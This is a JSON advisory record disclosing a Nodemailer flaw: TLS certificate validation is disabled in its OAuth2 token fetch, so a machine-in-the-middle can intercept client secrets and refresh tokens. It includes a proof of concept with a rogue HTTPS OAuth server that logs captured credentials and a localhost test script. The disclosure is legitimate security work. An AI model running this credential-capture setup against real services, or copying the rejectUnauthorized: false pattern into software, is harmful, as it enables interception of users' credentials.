{"id":"GHSA-r7g4-qg5f-qqm2","summary":"Nodemailer: Improper TLS Certificate Validation in OAuth2 Token Fetch Enables Credential Interception","details":"### Summary\nNodemailer disables TLS certificate verification in its internal HTTPS fetch client through the use of rejectUnauthorized: false inside lib/fetch/index.js.\n\nAs a result, OAuth2 token requests trust invalid or self-signed HTTPS certificates and transmit sensitive OAuth credentials over connections that should fail TLS validation.\n\nAn attacker in a machine-in-the-middle position can intercept OAuth2 credential exchanges and capture:\n\n- OAuth client_secret\n- refresh_token\n- access tokens\n\nThe issue was verified through runtime testing using a self-signed HTTPS OAuth endpoint.\n\n### Details\nRoot Cause\n\nThe issue originates from the internal HTTPS fetch implementation used by Nodemailer for OAuth2 token retrieval and related outbound HTTPS requests.\n\nInside:\n\n`lib/fetch/index.js`\n\nthe request options contain:\n\n`rejectUnauthorized: false`\n\nThis disables TLS peer certificate verification globally for the internal HTTPS client unless explicitly overridden through optional TLS configuration.\n\nAs a result:\n\n- self-signed certificates are trusted\n- invalid CA chains are accepted\n- hostname validation is bypassed\n- attacker-controlled HTTPS endpoints are treated as trusted\n\nThis violates expected HTTPS security guarantees.\n\n**Vulnerable Flow**\n\nThe vulnerable execution chain is:\n\nOAuth2 Transport\n        ↓\nXOAuth2 token generation\n        ↓\nInternal HTTPS fetch client\n        ↓\nHTTPS request with rejectUnauthorized:false\n        ↓\nAttacker-controlled/self-signed endpoint trusted\n        ↓\nOAuth credentials **transmitted**\n\n\n### PoC\n**Environment**\n#### Mail API (app/server.js)\n```\nconst express = require(\"express\");\nconst nodemailer = require(\"nodemailer\");\nrequire(\"dotenv\").config();\n\nconst app = express();\n\napp.use(express.json());\n\nconst transporter = nodemailer.createTransport({\n    host: process.env.SMTP_HOST,\n    port: process.env.SMTP_PORT,\n    secure: false,\n    auth: {\n        user: process.env.SMTP_USER,\n        pass: process.env.SMTP_PASS\n    }\n});\n\napp.post(\"/send\", async (req, res) =\u003e {\n    try {\n        const { to, subject, text, html } = req.body;\n\n        const info = await transporter.sendMail({\n            from: `\"Mailer\" \u003c${process.env.SMTP_USER}\u003e`,\n            to,\n            subject,\n            text,\n            html\n        });\n\n        res.json({\n            success: true,\n            messageId: info.messageId\n        });\n\n    } catch (err) {\n        console.error(err);\n        res.status(500).json({\n            success: false,\n            error: err.message\n        });\n    }\n});\n\napp.listen(process.env.PORT, () =\u003e {\n    console.log(`Mailer running on port ${process.env.PORT}`);\n});\n```\n\n#### Malicious HTTPS OAuth Server (poc/evil-oauth.js)\n\n```\nconst https = require('https');\nconst fs = require('fs');\n\nhttps.createServer({\n    key: fs.readFileSync('./key.pem'),\n    cert: fs.readFileSync('./cert.pem')\n}, (req, res) =\u003e {\n\n    console.log('\\n==== REQUEST INTERCEPTED ====');\n    console.log(req.method, req.url);\n\n    let body = '';\n\n    req.on('data', chunk =\u003e {\n        body += chunk;\n    });\n\n    req.on('end', () =\u003e {\n\n        console.log('\\nPOST BODY:');\n        console.log(body);\n\n        res.writeHead(200, {\n            'Content-Type': 'application/json'\n        });\n\n        res.end(JSON.stringify({\n            access_token: 'attacker_token',\n            expires_in: 3600\n        }));\n    });\n\n}).listen(8443, () =\u003e {\n    console.log('Malicious HTTPS OAuth server listening on 8443');\n});\n```\n\n#### Nodemailer OAuth2 Test (test.js)\n\n```\nconst nodemailer = require('./');\n\nconst transporter = nodemailer.createTransport({\n    service: 'gmail',\n\n    auth: {\n        type: 'OAuth2',\n\n        user: 'redacted@example.com',\n\n        clientId: 'CLIENT_ID_REDACTED',\n        clientSecret: 'CLIENT_SECRET_REDACTED',\n\n        refreshToken: 'REFRESH_TOKEN_REDACTED',\n\n        accessUrl: 'https://localhost:8443/token'\n    }\n});\n\ntransporter.sendMail({\n    from: 'redacted@example.com',\n    to: 'redacted@example.com',\n    subject: 'PoC',\n    text: 'test'\n\n}, (err, info) =\u003e {\n\n    console.log('\\n==== NODEMAILER RESULT ====');\n\n    if (err) {\n        console.error(err);\n    } else {\n        console.log(info);\n    }\n});\n```\n**Steps to Reproduce**\n\n- Start malicious HTTPS OAuth server:\n- node poc/evil-oauth.js\n- Run Nodemailer OAuth2 test:\n- node test.js\n- Observe intercepted OAuth2 request body on the malicious HTTPS server.\n\n**PIC**\n\u003cimg width=\"1919\" height=\"1029\" alt=\"image\" src=\"https://github.com/user-attachments/assets/fdeafeb4-c0c5-49f8-beeb-e7f945be0516\" /\u003e\n\n### Impact\n\n- OAuth credential theft\n- unauthorized email access\n- persistent token abuse\n- unauthorized mail sending\n- mailbox compromise\n- interception/tampering of OAuth responses\n\nThe issue effectively downgrades HTTPS security protections for sensitive OAuth credential exchanges.","aliases":["CVE-2026-82662"],"modified":"2026-09-10T03:50:50.445720018Z","published":"2026-06-15T17:34:48Z","database_specific":{"severity":"MODERATE","github_reviewed":true,"github_reviewed_at":"2026-06-15T17:34:48Z","nvd_published_at":null,"cwe_ids":["CWE-295"]},"references":[{"type":"WEB","url":"https://github.com/nodemailer/nodemailer/security/advisories/GHSA-r7g4-qg5f-qqm2"},{"type":"PACKAGE","url":"https://github.com/nodemailer/nodemailer"}],"affected":[{"package":{"name":"nodemailer","ecosystem":"npm","purl":"pkg:npm/nodemailer"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"8.0.8"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/06/GHSA-r7g4-qg5f-qqm2/GHSA-r7g4-qg5f-qqm2.json","last_known_affected_version_range":"\u003c= 8.0.7"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N"}]}